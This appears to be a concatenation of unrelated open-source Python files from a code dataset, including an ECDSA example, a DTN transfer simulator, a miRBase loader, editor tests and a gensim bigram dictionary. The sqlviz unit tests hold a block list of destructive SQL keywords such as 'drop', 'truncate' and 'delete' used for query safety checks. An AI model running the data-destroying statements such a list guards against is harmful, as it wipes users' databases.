return simcity.get_task_database().get(id).value
except ValueError:
return error(404, "simulation does not exist")
@delete('/explore/simulation/<id>')
def del_simulation(id):
rev = request.query.get('rev')
if rev is None:
rev = request.get_header('If-Match')
if rev is None:
return error(409, "revision not specified")
task = Document({'_id': id, '_rev': rev})
try:
simcity.get_task_database().delete(task)
return {'ok': True}
except ResourceConflict:
return error(409, "resource conflict")
run(host='localhost', port=9090, server='gevent')
| apache-2.0 | -7,256,146,511,198,649,000 | 28.530172 | 98 | 0.610714 | false | 3.504348 | true | false | false |
seb-m/wcurve | examples/ecdsa.py | 1 | 2981 | """
ECDSA signature scheme.
Requires Python >= 2.4 (http://pypi.python.org/pypi/hashlib is needed for
python2.4).
"""
import hashlib
import random
import time
# Local import
try:
import wcurve
except ImportError:
from os.path import abspath, dirname
import sys
parent = dirname(dirname(abspath(__file__)))
sys.path.append(parent)
import wcurve
def _big_int_unpack_be(seq):
p = None
if isinstance(seq, str):
p = lambda x: ord(x)
else:
p = lambda x: x
return sum([p(seq[i]) << (i * 8) for i in range(len(seq) - 1, -1, -1)])
def generate_keypair(curve):
sk = random.SystemRandom().randint(1, curve.n - 1)
pk = sk * curve.base_point
pk.canonicalize() # needed for ephemeral key gen in sign()
return sk, pk
def sign(curve, secret_key, msg):
assert isinstance(curve, wcurve._Curve)
while True:
esk, epk = generate_keypair(curve)
r = epk.x % curve.n
if r == 0:
continue
e = _big_int_unpack_be(hashlib.sha256(msg.encode('utf8')).digest())
kinv = wcurve._FpArithmetic(curve.n).inverse(esk)
s = (kinv * (e + r * secret_key)) % curve.n
if s == 0:
continue
return r, s
def verify(pub_key, signature, msg):
if not isinstance(pub_key, wcurve.JacobianPoint):
return False
r, s = signature
curve = pub_key.curve
for v in signature:
if not (1 <= v <= (curve.n - 1)):
return False
e = _big_int_unpack_be(hashlib.sha256(msg.encode('utf8')).digest())
sinv = wcurve._FpArithmetic(curve.n).inverse(s)
u1 = e * sinv % curve.n
u2 = r * sinv % curve.n
q = u1 * curve.base_point + u2 * pub_key
if q.is_at_infinity():
return False
v = q.get_affine_x() % curve.n
if r == v:
return True
return False
def run(curve, tag):
sk, pk = generate_keypair(curve)
msg = "My message to sign"
# Signature
start = time.time()
sig = sign(curve, sk, msg)
sign_time = time.time() - start
# For signature verification there is no meaning of using infective
# computations in scalar multiplications.
if curve.infective:
pk.curve = wcurve.secp256r1_curve()
# Verification
start = time.time()
# /!\ in a real implementation the public key would most likely come
# from an untrusted remote party so it would then be required to check
# the validity of the public key before calling this function. That is
# instantiating the right curve, calling JacobianPoint.from_affine()
# or JacobianPoint.uncompress(), and calling JacobianPoint.is_valid().
valid = verify(pk, sig, msg)
verify_time = time.time() - start
print('%-25s: sign=%0.3fs verify=%0.3fs valid=%s' % \
(tag, sign_time, verify_time, valid))
if __name__ == '__main__':
run(wcurve.secp256r1_curve(), 'secp256r1')
run(wcurve.secp256r1_curve_infective(),
'secp256r1_curve_infective')
| mit | 4,652,287,337,975,180,000 | 29.418367 | 75 | 0.614559 | false | 3.301218 | false | false | false |
jackaljack/design-patterns | proxy.py | 1 | 1771 | """Proxy pattern
Proxy is a structural design pattern. A proxy is a surrogate object which can
communicate with the real object (aka implementation). Whenever a method in the
surrogate is called, the surrogate simply calls the corresponding method in
the implementation. The real object is encapsulated in the surrogate object when
the latter is instantiated. It's NOT mandatory that the real object class and
the surrogate object class share the same common interface.
"""
from abc import ABC, abstractmethod
class CommonInterface(ABC):
"""Common interface for Implementation (real obj) and Proxy (surrogate)."""
@abstractmethod
def load(self):
pass
@abstractmethod
def do_stuff(self):
pass
class Implementation(CommonInterface):
def __init__(self, filename):
self.filename = filename
def load(self):
print("load {}".format(self.filename))
def do_stuff(self):
print("do stuff on {}".format(self.filename))
class Proxy(CommonInterface):
def __init__(self, implementation):
self.__implementation = implementation # the real object
self.__cached = False
def load(self):
self.__implementation.load()
self.__cached = True
def do_stuff(self):
if not self.__cached:
self.load()
self.__implementation.do_stuff()
def main():
p1 = Proxy(Implementation("RealObject1"))
p2 = Proxy(Implementation("RealObject2"))
p1.do_stuff() # loading necessary
p1.do_stuff() # loading unnecessary (use cached object)
p2.do_stuff() # loading necessary
p2.do_stuff() # loading unnecessary (use cached object)
p1.do_stuff() # loading unnecessary (use cached object)
if __name__ == "__main__":
main()
| mit | -7,203,322,972,638,070,000 | 27.111111 | 80 | 0.673066 | false | 4.277778 | false | false | false |
LeoIannacone/dtn | emulab/theory.py | 5 | 5674 | #!/usr/bin/python
import sys
from heapq import *
from optparse import OptionParser
def dprint(msg):
print "[%d]: %s" % (time, msg)
arglist = ("count", "size", "num_hops", "bw", "hop_mode", "conn", "uptime", "downtime")
usage = "usage: %prog [options]"
parser = OptionParser(usage)
parser.add_option('--size', type='int', help='size of each message')
parser.add_option('--count', type='int', help='number of messages')
parser.add_option('--num_hops', type='int', help='number of hops')
parser.add_option('--bw', type='int', help='bandwidth')
parser.add_option('--hop_mode', help='hop mode (hop or e2e)')
parser.add_option('--conn', help='connectivity mode')
parser.add_option('--uptime', type='int', help='uptime in seconds')
parser.add_option('--downtime', type='int', help='downtime in seconds')
parser.set_defaults(num_hops=5)
parser.set_defaults(uptime=60)
parser.set_defaults(downtime=240)
(opts, args) = parser.parse_args()
def die():
parser.print_help()
sys.exit(0)
if opts.count == None or \
opts.size == None or \
opts.num_hops == None or \
opts.bw == None or \
opts.hop_mode == None or \
opts.conn == None or \
opts.uptime == None or \
opts.downtime == None: die()
count = opts.count
size = opts.size
num_hops = opts.num_hops
bw = opts.bw
uptime = opts.uptime
downtime = opts.downtime
hop_mode = opts.hop_mode
conn = opts.conn
last = num_hops - 1
total_size = count * size * 8
amount = map(lambda x: 0, range(0, num_hops))
links = map(lambda x: True, range(0, num_hops))
amount[0] = total_size
q = []
class SimDoneEvent:
def __init__(self, time):
self.time = time
def run(self):
print "maximum simulation time (%d) reached... ending simulation" % self.time
sys.exit(1)
class LinkEvent:
def __init__(self, time, link, mode):
self.time = time
self.link = link
self.mode = mode
def __cmp__(self, other):
return self.time.__cmp__(other.time)
def __str__(self):
return "Event @%d: link %d %s" % (self.time, self.link, self.mode)
def run(self):
if self.mode == 'up':
dprint('opening link %d' % self.link)
links[self.link] = True
self.time += uptime
self.mode = 'down'
else:
dprint('closing link %d' % self.link)
links[self.link] = False
self.time += downtime
self.mode = 'up'
queue_event(self)
class CompletedEvent:
def __init__(self, time, node):
self.time = time
self.node = node
def run(self):
pass
def queue_event(e):
global q
# dprint('queuing event %s' % e)
heappush(q, e)
# simulator completion event
time = 0
queue_event(SimDoneEvent(60*30))
# initial link events
if (conn == 'conn'):
pass
elif (conn == 'all2'):
for i in range(1, num_hops):
queue_event(LinkEvent(uptime, i, 'down'))
elif (conn == 'sequential'):
queue_event(LinkEvent(uptime, 1, 'down'))
for i in range(2, num_hops):
links[i] = False
queue_event(LinkEvent((i-1) * 60, i, 'up'))
elif (conn == 'offset2'):
for i in range (1, num_hops):
if i % 2 == 0:
links[i] = False
queue_event(LinkEvent(120, i, 'up'))
else:
queue_event(LinkEvent(uptime, i, 'down'))
elif (conn == 'shift10'):
if num_hops * 10 > 60:
raise(ValueError("can't handle more than 6 hops"))
queue_event(LinkEvent(uptime, 1, 'down'))
for i in range (2, num_hops):
links[i] = False
queue_event(LinkEvent(10 * (i-1), i, 'up'))
else:
raise(ValueError("conn mode %s not defined" % conn))
print 'initial link states:'
for i in range(0, num_hops):
print '\t%d: %s' % (i, links[i])
def can_move(i):
if hop_mode == 'hop':
dest = i+1
hops = (i+1,)
else:
dest = last
hops = range(i+1, last+1)
for j in hops:
if links[j] != True:
# dprint("can't move data from %d to %d since link %d closed" % (i, dest, j))
return False
return True
# proc to shuffle a given amount of data through the network
def move_data(interval):
dprint('%d seconds elapsed... trying to move data' % interval)
for i in range(0, last):
if not can_move(i):
continue
if hop_mode == 'hop':
dest = i+1
else:
dest = last
amt = min(amount[i], interval * bw)
if (amt != 0):
dprint('moving %d/%d bits (%d msgs) from %d to %d' %
(amt, amount[i], amt / (size*8), i, dest))
amount[i] -= amt
amount[dest] += amt
if dest == last and amount[dest] == total_size:
print "all data transferred..."
print "ELAPSED %d" % (time + interval)
sys.exit(0)
def blocked():
for i in range(0, last):
if can_move(i):
return False
return True
def completion_time():
# if nothing can move, then we have infinite completion time
if blocked():
return 9999999999.0
return float(sum(amount[:-1])) / float(bw)
while True:
try:
next_event = heappop(q)
except:
raise RuntimeError('no events in queue but not complete')
tcomplete = completion_time()
elapsed = next_event.time - time
if (tcomplete < elapsed):
dprint('trying to move last chunk')
move_data(tcomplete)
time = next_event.time
if (elapsed != 0 and not blocked()):
move_data(elapsed)
next_event.run()
| apache-2.0 | -5,409,233,377,742,971,000 | 24.908676 | 88 | 0.561509 | false | 3.308455 | false | false | false |
ucsd-ccbb/Oncolist | src/restLayer/app/MirBase.py | 1 | 2673 | import requests
import tarfile,sys
import urllib2
import json
import time
import pymongo
from itertools import islice
def run_mirbase_download():
load_mirbase_list(0)
return 0
def get_mir_data(mirna):
client = pymongo.MongoClient()
mirna_data = {
'results': []
}
mirnaarray = mirna.split(',')
for mirna_item in mirnaarray :
mystr = "";
terms = list(client.dataset.mirbase.find({'mId': mirna_item}))
if(len(terms) > 0):
mirna_data['results'].append({
'id': mirna_item,
'information': terms[0]['mirna_information']
})
return mirna_data
def get_mir_name_converter(term_id):
client = pymongo.MongoClient()
terms = list(client.dataset.mirbase.find({'mId': term_id}))
if(len(terms) > 0):
return terms[0]['mirna_id']
else:
return "UNKNOWN"
def get_mirbase_info(mirna_id): # EXT
mir_resolved_id = get_mir_name_converter(mirna_id)
if(mir_resolved_id is not "UNKNOWN"):
url = 'http://mygene.info/v2/query?q=' + mir_resolved_id
r = requests.get(url)
r_json = r.json()
if 'hits' in r_json and len(r_json['hits']) > 0:
entrezgene_id = r_json['hits'][0]['entrezgene']
url2 = 'http://mygene.info/v2/gene/' + str(entrezgene_id)
r2 = requests.get(url2)
r2_json = r2.json()
return r2_json
return r
else:
return "UNKNOWN TERM"
def load_mirbase_list(file_batch_number):
url = 'http://ec2-54-148-99-18.us-west-2.compute.amazonaws.com:9200/_plugin/head/mirna.txt'
r = requests.get(url)
lines = r.iter_lines()
def parse(lines):
for line in lines:
try:
c1, mirna_id, mId, c2, c3, c4, mirna_information, c5 = line.split('\t')
yield {
'mirna_id': mirna_id,
'mId': mId,
'mirna_information': mirna_information
}
except Exception as e:
warningLabel = e.message
db = pymongo.MongoClient().dataset
collection = db.mirbase
collection.drop()
count = 0
iterator = parse(lines)
while True:
records = [record for record in islice(iterator, 1000)]
if len(records) > 0:
count += len(collection.insert_many(records).inserted_ids)
else:
break
collection.create_indexes([
pymongo.IndexModel([('mirna_id', pymongo.ASCENDING)]),
pymongo.IndexModel([('mId', pymongo.ASCENDING)])
])
def main():
return 0
if __name__ == '__main__':
sys.exit(main()) | mit | -9,162,671,989,890,276,000 | 24.961165 | 95 | 0.558548 | false | 3.3 | false | false | false |
ilastik/ilastik-0.5 | ilastik/modules/interactive_segmentation/core/segmentors/segmentorSV2.py | 1 | 5024 | #!/usr/bin/env python
# -*- coding: utf-8 -*-
# Copyright 2010 C Sommer, C Straehle, U Koethe, FA Hamprecht. All rights reserved.
#
# Redistribution and use in source and binary forms, with or without modification, are
# permitted provided that the following conditions are met:
#
# 1. Redistributions of source code must retain the above copyright notice, this list of
# conditions and the following disclaimer.
#
# 2. Redistributions in binary form must reproduce the above copyright notice, this list
# of conditions and the following disclaimer in the documentation and/or other materials
# provided with the distribution.
#
# THIS SOFTWARE IS PROVIDED BY THE ABOVE COPYRIGHT HOLDERS ``AS IS'' AND ANY EXPRESS OR IMPLIED
# WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND
# FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE ABOVE COPYRIGHT HOLDERS OR
# CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR
# CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
# SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON
# ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING
# NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF
# ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
#
# The views and conclusions contained in the software and documentation are those of the
# authors and should not be interpreted as representing official policies, either expressed
# or implied, of their employers.
"""
Watershed iterative segmentation plugin
"""
from segmentorBase import *
from enthought.traits.api import Float, Int
from enthought.traits.ui.api import View, Item
#from segmentorWSit import SegmentorWSiter
ok = False
try:
import vigra.tws
ok = True
except Exception, e:
pass
if 0:
#*******************************************************************************
# S e g m e n t o r S V 2 *
#*******************************************************************************
class SegmentorSV2(SegmentorBase):
name = "Supervoxel Segmentation 2"
description = "Segmentation plugin using sparse Basin graph"
author = "HCI, University of Heidelberg"
homepage = "http://hci.iwr.uni-heidelberg.de"
bias = Float(64*8)
biasedLabel = Int(1)
maxHeight = Float(1024)
view = View( Item('bias'), Item('maxHeight'), Item('biasedLabel'), buttons = ['OK', 'Cancel'], )
#*******************************************************************************
# I n d e x e d A c c e s s o r *
#*******************************************************************************
class IndexedAccessor:
"""
Helper class that behaves like an ndarray, but does a Lookuptable access
"""
def __init__(self, volumeBasins, basinLabels):
self.volumeBasins = volumeBasins
self.basinLabels = basinLabels
self.dtype = basinLabels.dtype
self.shape = volumeBasins.shape
def __getitem__(self, key):
return self.basinLabels[self.volumeBasins[tuple(key)]]
def __setitem__(self, key, data):
#self.data[tuple(key)] = data
print "##########ERROR ######### : SegmentationDataAccessor setitem should not be called"
def segment3D(self, labelVolume, labelValues, labelIndices):
self.ws.setBias(self.bias, self.biasedLabel, self.maxHeight)
self.basinLabels = self.ws.flood(labelValues, labelIndices)
self.acc = SegmentorWSiter.IndexedAccessor(self.volumeBasins, self.basinLabels)
return self.acc
def segment2D(self, labels):
#TODO: implement
return labelVolume
def setupWeights(self, weights):
print "Incoming weights :", weights.shape
#self.weights = numpy.average(weights, axis = 3).astype(numpy.uint8)#.swapaxes(0,2).view(vigra.ScalarVolume)#
if weights.dtype != numpy.uint8:
print "converting weights to uint8"
self.weights = weights.astype(numpy.uint8)
# self.weights = numpy.zeros(weights.shape[0:-1], 'uint8')
# self.weights[:] = 3
# self.weights[:,:,0::4] = 10
# self.weights[:,0::4,:] = 10
# self.weights[0::4,:,:] = 10
# self.weights = self.weights
self.ws = vigra.tws.IncrementalWS2(self.weights)
self.volumeBasins = self.ws.getVolumeBasins() #WithBorders()
print "Outgoing weights :", self.volumeBasins.shape
self.volumeBasins.shape = self.volumeBasins.shape + (1,)
| bsd-2-clause | 8,846,247,614,698,652,000 | 43.070175 | 121 | 0.592357 | false | 4.239662 | false | false | false |
again4you/retext | tests/test_editor.py | 3 | 2873 | # This file is part of ReText
# Copyright: 2014 Dmitry Shachnev
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 2 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
import unittest
from ReText.editor import documentIndentMore, documentIndentLess
from PyQt5.QtGui import QTextCursor, QTextDocument
class SettingsMock:
tabWidth = 4
tabInsertsSpaces = True
class TestIndentation(unittest.TestCase):
def setUp(self):
self.document = QTextDocument()
self.document.setPlainText('foo\nbar\nbaz')
self.settings = SettingsMock()
def test_indentMore(self):
cursor = QTextCursor(self.document)
cursor.setPosition(4)
documentIndentMore(self.document, cursor, self.settings)
self.assertEqual('foo\n bar\nbaz',
self.document.toPlainText())
cursor.setPosition(3)
documentIndentMore(self.document, cursor, self.settings)
self.assertEqual('foo \n bar\nbaz',
self.document.toPlainText())
def test_indentMoreWithTabs(self):
cursor = QTextCursor(self.document)
self.settings.tabInsertsSpaces = False
documentIndentMore(self.document, cursor, self.settings)
self.assertEqual('\tfoo\nbar\nbaz', self.document.toPlainText())
def test_indentMoreWithSelection(self):
cursor = QTextCursor(self.document)
cursor.setPosition(1)
cursor.setPosition(6, QTextCursor.KeepAnchor)
self.assertEqual('oo\u2029ba', # \u2029 is paragraph separator
cursor.selectedText())
documentIndentMore(self.document, cursor, self.settings)
self.assertEqual(' foo\n bar\nbaz',
self.document.toPlainText())
def test_indentLess(self):
self.document.setPlainText(' foo')
cursor = QTextCursor(self.document)
cursor.setPosition(10)
documentIndentLess(self.document, cursor, self.settings)
self.assertEqual(' foo', self.document.toPlainText())
documentIndentLess(self.document, cursor, self.settings)
self.assertEqual('foo', self.document.toPlainText())
def test_indentLessWithSelection(self):
self.document.setPlainText(' foo\n bar\nbaz')
cursor = QTextCursor(self.document)
cursor.setPosition(5)
cursor.setPosition(11, QTextCursor.KeepAnchor)
documentIndentLess(self.document, cursor, self.settings)
self.assertEqual('foo\nbar\nbaz', self.document.toPlainText())
if __name__ == '__main__':
unittest.main()
| gpl-3.0 | -1,381,616,808,012,160,800 | 36.311688 | 71 | 0.741733 | false | 3.482424 | true | false | false |
sqlviz/sqlviz | tests/unit/test_query.py | 1 | 2690 | from unittest import TestCase
import website.query
import pandas as pd
import json
class TestLimits(TestCase):
def test_adding_simple_limits(self):
query = website.query.Query(
query_text="select * from some_table",
db=1)
query.add_limit()
self.assertEqual(
query.query_text,
"select * from some_table limit 1000;")
def test_semicolon_limits(self):
query = website.query.Query(
query_text="select * from some_table;",
db=1)
query.add_limit()
self.assertEqual(
query.query_text,
"select * from some_table limit 1000;")
def test_limit_already_exists(self):
query = website.query.Query(
query_text="select * from some_table limit 10",
db=1)
query.add_limit()
self.assertEqual(
query.query_text,
"select * from some_table limit 10")
def test_limit_semicolon_already_exists(self):
query = website.query.Query(
query_text="select * from some_table limit 10;",
db=1)
query.add_limit()
self.assertEqual(
query.query_text,
"select * from some_table limit 10;")
class TestSafety(TestCase):
def stop_words(self):
base_query = "select * from some_table"
stop_words = ['insert', 'delete', 'drop',
'truncate', 'alter', 'grant']
for word in stop_words:
query = website.query.Query(
query_text="%s %s " % (word, base_query),
db=1)
self.assertRaises(TypeError, query.check_safety)
class TestManipulateData(TestCase):
"""def test_numericalize_data_array(self):
md = website.query.ManipulateData(
query_text='',
db='')
md.data_array = [['a', '3', '4.0', '2014-01-02']]
return_array = md.numericalize_data_array()
self.assertListEqual(return_array, [['a', 3, 4.0, '2014-01-02']])
"""
def test_pivot(self):
md = website.query.ManipulateData(
query_text='',
db='')
test_data = {
'col1': ['cat', 'dog', 'cat', 'bear'],
'col2': ['summer', 'summer', 'winter', 'winter'],
'val': [1, 2, 3, 4]}
md.data = pd.DataFrame(test_data)
return_data = json.loads(md.pivot().to_json())
self.assertDictEqual(
return_data,
{
"col1": {"0": "bear", "1": "cat", "2": "dog"},
"summer": {"0": 0.0, "1": 1.0, "2": 2.0},
"winter": {"0": 4.0, "1": 3.0, "2": 0.0}
})
| mit | -8,957,055,358,823,039,000 | 31.409639 | 73 | 0.514498 | false | 3.695055 | true | false | false |
osamak/student-portal | arshidni/forms.py | 2 | 4567 | # -*- coding: utf-8 -*-
from arshidni.models import GraduateProfile, Question, Answer, StudyGroup, LearningObjective, JoinStudyGroupRequest, ColleagueProfile, SupervisionRequest
from django import forms
class GraduateProfileForm(forms.ModelForm):
class Meta:
model = GraduateProfile
fields = ['contacts', 'bio', 'interests',
'answers_questions', 'gives_lectures']
class QuestionForm(forms.ModelForm):
class Meta:
model = Question
fields = ['text']
class AnswerForm(forms.ModelForm):
class Meta:
model = Answer
fields = ['text']
class StudyGroupForm(forms.ModelForm):
class Meta:
model = StudyGroup
fields = ['name', 'starting_date', 'ending_date',
'max_members']
def clean(self):
cleaned_data = super(StudyGroupForm, self).clean()
if 'starting_date' in cleaned_data and 'ending_date' in cleaned_data:
if cleaned_data['starting_date'] > cleaned_data['ending_date']:
msg = u'تاريخ انتهاء المدة قبل تاريخ بدئها!'
self._errors["starting_date"] = self.error_class([msg])
self._errors["ending_date"] = self.error_class([msg])
# Remove invalid fields
del cleaned_data["starting_date"]
del cleaned_data["ending_date"]
new_learningobjective_fields = [field for field in self.data if field.startswith('new_learningobjective-')]
existing_learningobjective_fields = [field for field in self.data if field.startswith('existing_learningobjective-')]
for field_name in new_learningobjective_fields:
text = self.data[field_name].strip()
if not text: # if empty
continue
cleaned_data[field_name] = self.data[field_name]
for field_name in existing_learningobjective_fields:
text = self.data[field_name].strip()
if not text: # if empty
continue
cleaned_data[field_name] = self.data[field_name]
return cleaned_data
def clean_max_members(self):
"Define max_members range."
# TODO: Move this hard-coded number into a Django setting.
# The maximum number of students in each group is 8.
max_members = self.cleaned_data["max_members"]
if max_members > 8:
msg = u'لا يمكن أن يكون عدد أعضاء المجموعة أكثر من 8!'
self._errors["max_members"] = self.error_class([msg])
elif max_members < 3:
msg = u'لا يمكن أن يكون عدد أعضاء المجموعة أقل من 3!'
self._errors["max_members"] = self.error_class([msg])
return max_members
def save(self, *args, **kwargs):
group = super(StudyGroupForm, self).save(*args, **kwargs)
remaining_pk = [] # List of kept learning objects (whether
# modified or not)
new_learningobjective_fields = [field for field in self.cleaned_data if field.startswith('new_learningobjective-')]
existing_learningobjective_fields = [field for field in self.cleaned_data if field.startswith('existing_learningobjective-')]
for field_name in new_learningobjective_fields:
text = self.cleaned_data[field_name]
new_learningobjective = LearningObjective.objects.create(group=group,text=text)
remaining_pk.append(new_learningobjective.pk)
for field_name in existing_learningobjective_fields:
pk_str = field_name.lstrip("existing_learningobjective-")
pk = int(pk_str)
remaining_pk.append(pk)
text = self.cleaned_data[field_name]
existing_learningobjective = LearningObjective.objects.get(pk=pk)
existing_learningobjective.text = text
existing_learningobjective.save()
deleted_learningobjectives = LearningObjective.objects.exclude(pk__in=remaining_pk).filter(group=group)
for deleted_learningobjective in deleted_learningobjectives:
print "Deleting", deleted_learningobjective.text
deleted_learningobjective.delete()
return group
class ColleagueProfileForm(forms.ModelForm):
class Meta:
model = ColleagueProfile
fields = ['batch', 'contacts', 'bio', 'interests', 'tags']
class SupervisionRequestForm(forms.ModelForm):
class Meta:
model = SupervisionRequest
fields = ['batch', 'contacts', 'interests']
| agpl-3.0 | 4,208,945,619,795,110,400 | 42.407767 | 153 | 0.63431 | false | 3.89121 | false | false | false |
lum4chi/mygensim | corpora/bidictionary.py | 1 | 8483 | #!/usr/bin/env python
# -*- coding: utf-8 -*-
#
# Copyright (C) 2016 Francesco Lumachi <[email protected]>
from __future__ import division
from gensim import corpora, utils
from six import iteritems, itervalues, iterkeys
from collections import defaultdict
from itertools import tee, izip
from scipy.stats import rv_discrete
class Bidictionary(utils.SaveLoad):
# TODO not completely implemented all methods as a gensim dictionary!
"""
This object provide a convenient way to parse document (seen as list of tokens
in appearance order!) while extracting bigrams frequencies, returning gensim-like
"bag-of-bigrams" vector, which in features (bi-tokens) are identified by a tuple
(firstId, secondId).
Ex: bd = Bidictionary(documents=<some_corpus>)
bd[<token_id>] # return id->plain_token (from corpora.Dictionary)
bd.token2id[<token>] # return plain_token->id (from corpora.Dictionary)
bd.fid_sid2id[<firstId>, <secondId>] # return tokenid, tokenid -> bitokenid
bd.dfs[bitokenid] # return document frequency of bitoken
"""
def __init__(self, documents=None, prune_at=2000000, doc_start='^', doc_end='$'):
"""
Choose doc_start, doc_end to some char ignore by tokenizer, otherwise statistics
about start/end token will be compromised.
"""
self._unidict = corpora.Dictionary()
# add dummy doc to map start/end chars (will produce len(unidict)+1: nevermind)
self._unidict.doc2bow([doc_start, doc_end], allow_update=True)
self.doc_start, self.doc_end = doc_start, doc_end
# Statistics gensim-like
self.fid_sid2bid = {} # (firstid, secondid) -> tokenId
self.bid2fid_sid = {} # TODO: reverse mapping for fid_sid2bid; only formed on request, to save memory
self.dfs = {} # document frequencies: tokensId -> in how many documents those tokens appeared
self.num_pos = 0 # total number of corpus positions
self.num_nnz = 0 # total number of non-zeroes in the BOW matrix
if documents is not None:
self.add_documents(documents, prune_at=prune_at)
num_docs = property(lambda self: self._unidict.num_docs - 1) # 1 is the dummy doc ['^','$']
def doc2bob(self, document, allow_update=False, return_missing=False):
""" Document tokens are parsed pairwise to produce bag-of-bitokens features """
positional_doc = [self.doc_start] + document + [self.doc_end]
# Index single tokens
self._unidict.doc2bow(positional_doc, allow_update, return_missing)
# Construct ((firstid, secondid), frequency) mapping.
d1, d2 = tee(positional_doc)
next(d2, None) # step ahead second iterator
counter = defaultdict(int)
for first, second in izip(d1, d2):
# saving space using same indexes as unidict
try:
firstid = self._unidict.token2id[first]
secondid = self._unidict.token2id[second]
counter[firstid, secondid] += 1
except KeyError: # 1 or both token aren't indexed: skip.
continue
fid_sid2bid = self.fid_sid2bid
if allow_update or return_missing:
missing = dict((f_s, freq) for f_s, freq in iteritems(counter) if f_s not in fid_sid2bid)
if allow_update:
for w in missing:
# new id = number of ids made so far;
# NOTE this assumes there are no gaps in the id sequence!
fid_sid2bid[w] = len(fid_sid2bid)
result = dict((fid_sid2bid[w], freq) for w, freq in iteritems(counter) if w in fid_sid2bid)
if allow_update:
self.num_pos += sum(itervalues(counter))
self.num_nnz += len(result)
# increase document count for each unique token that appeared in the document
dfs = self.dfs
for bid in iterkeys(result):
dfs[bid] = dfs.get(bid, 0) + 1
# return tokensids, in ascending id order
result = sorted(iteritems(result))
if return_missing:
return result, missing
else:
return result
def add_documents(self, docs, prune_at=2000000):
for d in docs:
self.doc2bob(d, allow_update=True)
def tokens2bid(self, tokens):
"""
:param tokens: need to be a tuple ('a','b')
"""
fid, sid = self._unidict.token2id[tokens[0]], self._unidict.token2id[tokens[1]]
return self.fid_sid2bid[(fid, sid)]
def __getitem__(self, ids):
# If you want the frequency, you need to ask for a "bid" and then to self.dfs[bid]
if isinstance(ids, int): return self._unidict.__getitem__(ids) # tid -> 'token'
if isinstance(ids, str): return self._unidict.token2id[ids] # 'token' -> id
if isinstance(ids, tuple):
if isinstance(ids[0], int): return self.fid_sid2bid[ids] # fid, sid -> bid
if isinstance(ids[0], str): return self.tokens2bid(ids) # 'a', 'b' -> bid
@staticmethod
def load_from_text(fname):
return super(Bidictionary, fname).load_from_text(fname)
def save_as_text(self, fname, sort_by_word=True):
"""
Save this Dictionary to a text file, in format:
`id[TAB]fid[TAB]sid[TAB]document frequency[NEWLINE]`
and _unidict has an usual gensim dictionary
"""
self._unidict.save_as_text(fname + '.index', sort_by_word)
with utils.smart_open(fname, 'wb') as fout:
# no word to display in bidict
for fid_sid, id in sorted(iteritems(self.fid_sid2bid)):
line = "%i\t%i\t%i\t%i\n" % (id, fid_sid[0], fid_sid[1], self.dfs.get(id, 0))
fout.write(utils.to_utf8(line))
@staticmethod
def load_from_text(fname):
"""
Load a previously stored Dictionary from a text file.
Mirror function to `save_as_text`.
"""
result = Bidictionary()
# restore _unidict as gensim dictionary
result._unidict = corpora.Dictionary.load_from_text(fname + '.index')
with utils.smart_open(fname) as f:
for lineno, line in enumerate(f):
line = utils.to_unicode(line)
try:
bid, fid, sid, docfreq = line[:-1].split('\t')
fid_sid = (int(fid), int(sid))
except Exception:
raise ValueError("invalid line in dictionary file %s: %s"
% (fname, line.strip()))
bid = int(bid)
if fid_sid in result.fid_sid2bid:
raise KeyError('token %s is defined as ID %d and as ID %d' % (fid_sid, bid, result.fid_sid2bid[fid_sid]))
result.fid_sid2bid[fid_sid] = bid
result.dfs[bid] = int(docfreq)
return result
def mle(self, estimated, given):
""" Compute Maximum Likelihood Estimation probability
to extract the second token given first. """
try:
firstid = self._unidict.token2id[given]
secondid = self._unidict.token2id[estimated]
return self.dfs[self.fid_sid2bid[firstid, secondid]] / self._unidict.dfs[firstid]
except KeyError:
return 0.0
def mlebyids(self, estimated, given):
""" Compute Maximum Likelihood Estimation probability
to extract the second token id given first id. """
try:
return self.dfs[self.fid_sid2bid[given, estimated]] / self._unidict.dfs[given]
except KeyError:
return 0.0
def generate_text(self, seed, n):
""" Given a seed token, produce n likelihood tokens to follow. """
def nexttokenid(seedid):
candidates = [sid for fid, sid in self.fid_sid2bid.keys() if fid == seedid]
if len(candidates) == 0: raise StopIteration
probs = [self.mlebyids(probid, seedid) for probid in candidates]
return rv_discrete(values=(candidates, probs)).rvs()
seedid = self._unidict.token2id[seed]
text = [seed]
for n in range(0, n):
try:
seedid = nexttokenid(seedid)
text.append(self._unidict[seedid])
except StopIteration:
break
return ' '.join(text)
| gpl-3.0 | -1,737,981,581,561,137,000 | 43.413613 | 125 | 0.591536 | false | 3.798925 | false | false | false |
Scille/parsec-cloud | parsec/backend/memory/realm.py | 1 | 11618 | # Parsec Cloud (https://parsec.cloud) Copyright (c) AGPLv3 2016-2021 Scille SAS
import attr
import pendulum
from uuid import UUID
from typing import List, Dict, Optional, Tuple
from parsec.api.data import UserProfile
from parsec.api.protocol import DeviceID, UserID, OrganizationID
from parsec.backend.backend_events import BackendEvent
from parsec.backend.realm import (
MaintenanceType,
RealmGrantedRole,
BaseRealmComponent,
RealmRole,
RealmStatus,
RealmStats,
RealmAccessError,
RealmIncompatibleProfileError,
RealmAlreadyExistsError,
RealmRoleAlreadyGranted,
RealmNotFoundError,
RealmEncryptionRevisionError,
RealmParticipantsMismatchError,
RealmMaintenanceError,
RealmInMaintenanceError,
RealmNotInMaintenanceError,
)
